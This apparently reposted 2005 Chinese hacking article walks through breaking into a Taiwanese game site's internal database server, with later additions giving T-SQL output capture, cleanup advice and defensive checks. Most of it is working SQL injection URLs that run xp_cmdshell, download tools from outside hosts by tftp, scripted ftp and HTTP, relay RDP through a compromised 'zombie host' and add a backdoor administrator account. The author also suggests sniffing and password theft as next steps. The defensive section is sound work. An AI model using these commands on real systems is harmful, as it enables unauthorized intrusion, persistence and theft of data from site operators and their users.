Intranet database server intrusion in practice (vulnerability warning, Black Bar Safety Net)

Source: www.myhack58.com, MYHACK58:6220054069
Author: Anonymous (佚名)
Published: 2005-10-26 00:00:00

Takeaway: when dealing with a database server that sits on the internal network and exposes no ports to the outside, there is no good way in other than bouncing a port out to get a shell. Doing everything through cmd is too much trouble and makes it awkward to penetrate further into the intranet. Below I explain my approach using one site as the example.

Target: http://xx.tw, Taiwan's largest comprehensive game site. Prior information: the site has an injection point, and the web server and the database server are not the same machine. The web application connects to the database with SQL sa privileges. Using NBSI2 it could be seen that the database server is on the internal network and has no ports open to the outside; the web server only has port 80 mapped. First let's check whether the database server can reach the Internet.

http://xx.tw/news-game.asp?ch_id=001&newsid=2215' create table [xl] ([xl1][varchar](255),[xl2][varchar](255))--
http://xx.tw/news-game.asp?ch_id=001&newsid=2215' insert into xl(xl1) exec%20master.dbo.xp_cmdshell%20'ping 163.com'--

Then read back the contents of xl1: yes, the intranet machine can reach the Internet; everything is that lucky. Start by uploading a program that can download files. It is winegg's down.exe.
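The capture-table trick used in the two injected URLs above, written out as the T-SQL the database server actually executes; this is an added example, not code from the article. It assumes the same sysadmin (sa) login and an available xp_cmdshell, and adds one thing the article's table lacks: an IDENTITY column, because a heap with two varchar columns gives no guarantee that the output lines come back in order.

```sql
-- Added example (not from the article): command-output capture via xp_cmdshell.
-- Assumes a sysadmin login and xp_cmdshell available, as in the article.

-- 1. Capture table. The article's xl has only xl1/xl2 (varchar), so rows come
--    back in no guaranteed order; the IDENTITY column xl0 fixes that.
IF OBJECT_ID('dbo.xl') IS NOT NULL DROP TABLE dbo.xl;
CREATE TABLE dbo.xl (
    xl0 INT IDENTITY(1,1) PRIMARY KEY,
    xl1 VARCHAR(255),
    xl2 VARCHAR(255)
);

-- 2. Run the command. xp_cmdshell returns one row per line of stdout,
--    followed by a single NULL row when the command finishes.
INSERT INTO dbo.xl (xl1) EXEC master.dbo.xp_cmdshell 'ping -n 1 163.com';

-- 3. Read the output back in order. Through an injection point that only
--    returns one value per request, fetch line N with
--      SELECT xl1 FROM dbo.xl WHERE xl0 = N
--    and stop when the row is NULL or missing.
SELECT xl0, xl1 FROM dbo.xl WHERE xl1 IS NOT NULL ORDER BY xl0;

-- 4. Drop the table afterwards; left behind, it is an obvious artefact
--    for anyone reviewing the database later.
DROP TABLE dbo.xl;
```

Each statement above maps onto one injected request in the article (the `'` closes the newsid literal, the `--` comments out the rest of the original query); the spaces are sent as `%20` so the URL survives the browser and the web server intact.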

http://xx.tw/news-game.asp?ch_id=001&newsid=2215' insert%20into%20xl(xl1) exec%20master.dbo.xp_cmdshell%20'tftp -i 211.78.39.64 get down.exe'--

Listing with xp_dirtree showed the file was not under system32, and xl1 showed a timeout, so it failed. I switched to a different tftp server to test, still without success, so the only option left was ftp:

http://xx.tw/news-game.asp?ch_id=001&newsid=2215' exec%20master.dbo.xp_cmdshell%20'echo open 211.78.39.64 >345.txt'--
http://xx.tw/news-game.asp?ch_id=001&newsid=2215' exec%20master.dbo.xp_cmdshell%20'echo xxxx >>345.txt'--
http://xx.tw/news-game.asp?ch_id=001&newsid=2215' exec%20master.dbo.xp_cmdshell%20'echo xxxx >>345.txt'--
http://xx.tw/news-game.asp?ch_id=001&newsid=2215' exec%20master.dbo.xp_cmdshell%20'echo get down.exe >>345.txt'--
http://xx.tw/news-game.asp?ch_id=001&newsid=2215' exec%20master.dbo.xp_cmdshell%20'echo qui >>345.txt'--
http://xx.tw/news-game.asp?ch_id=001&newsid=2215' exec%20master.dbo.xp_cmdshell%20'ftp -s:345.txt'--

The two xxxx lines are the FTP user name and password; ftp -s: runs the commands in the file non-interactively, which is what makes the transfer work from a shell that has no stdin.

OK, success. Now we can download whatever we want. First download fport.exe, which lists which process is listening on which port; check xl1 to confirm it succeeded, then see what ports the machine has open.

http://xx.tw/news-game.asp?ch_id=001&newsid=2215'%20insert%20into%20xl(xl1)%20exec%20master.dbo.xp_cmdshell%20'down.exe%20http://666w.com/tools/foprt.exe'--
http://xx.tw/news-game.asp?ch_id=001&newsid=2215'%20insert%20into%20xl(xl1)%20exec%20master.dbo.xp_cmdshell%20'fport'--

Port 3389 is open, but obviously it is not mapped to the outside. What to do? We need to get it mapped out ourselves. I found the vIDC software written by yyc. It has a client side and a server side: the server side, idc.exe, runs on a zombie host (肉鸡) I already control, on its default port 8080; just running it there is enough. The client side, vIDCc.exe and vIDCc.DLL, has a graphical interface and cannot be driven from a command shell, so I modified it, adding an ini file so that it connects and binds the port automatically according to the ini configuration. Download it to the compromised server with down.exe, run it, and it binds 3389. Here we bind the intranet database server's port 3389 to port 7778 on my zombie host, then add an administrator on the compromised machine:

http://xx.tw/news-game.asp?ch_id=001&newsid=2215' exec master.dbo.xp_cmdshell 'vidcc.exe'--
http://xx.tw/news-game.asp?ch_id=001&newsid=2215' exec master.dbo.xp_cmdshell 'net user xiaolu luaixue /add'--
http://xx.tw/news-game.asp?ch_id=001&newsid=2215' exec master.dbo.xp_cmdshell 'net localgroup administrators xiaolu /add'--

OK, connect to the zombie host on port 7778, log in, and you are on the database server. Scan the web server from there: it has almost every port that can be opened, including 139. After that, findpass, a sniffer, and so on, the rest is up to you.
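Every step of the chain above depends on three things the database server gave away: the web application's login is sysadmin, xp_cmdshell is executable, and the server can make outbound FTP/HTTP connections. The checks a database administrator would run to verify the first two are collected below as an added example, not part of the article; it is written for SQL Server 2005 and later (the sp_configure switch and sys.tables do not exist on SQL Server 2000, where the equivalent is revoking EXECUTE on master.dbo.xp_cmdshell from the application login and inspecting sysobjects), and 'webapp' is an assumed login name to replace with the real one.

```sql
-- Added example (not from the article): checks against the chain above.
-- Run as a sysadmin on the SQL Server. 'webapp' is an assumed login name.

-- 1. Is the web application's login sysadmin? 1 reproduces the article's
--    "sa permissions" situation. The application login belongs in its own
--    database with db_datareader/db_datawriter, never in sysadmin.
SELECT IS_SRVROLEMEMBER('sysadmin', 'webapp') AS webapp_is_sysadmin;

-- 2. Is xp_cmdshell enabled? Off by default on 2005+; a sysadmin can turn
--    it back on, which is why check 1 matters more than this one.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell';          -- config_value 1 = enabled
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;

-- 3. Look for leftover capture tables of the kind the article creates:
--    recently created tables in the application database with no matching
--    change record, typically a couple of varchar columns and no keys.
SELECT t.name, t.create_date, COUNT(c.column_id) AS columns
FROM sys.tables AS t
JOIN sys.columns AS c ON c.object_id = t.object_id
GROUP BY t.name, t.create_date
ORDER BY t.create_date DESC;
```

The third point the chain needed, outbound access from the database server to the Internet (the ping to 163.com, the FTP and HTTP downloads), is not something the database can check for itself; it is an egress-filtering rule on the firewall in front of the internal network, and without it the downloads in this article would have failed at the first step.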

Postscript: this article is meant to give you a new way of thinking about intrusion, not to be imitated directly; if you break the law, that is on you. This article, together with the modified vIDC software, was published in Hacker X-Files 2004 No. 8.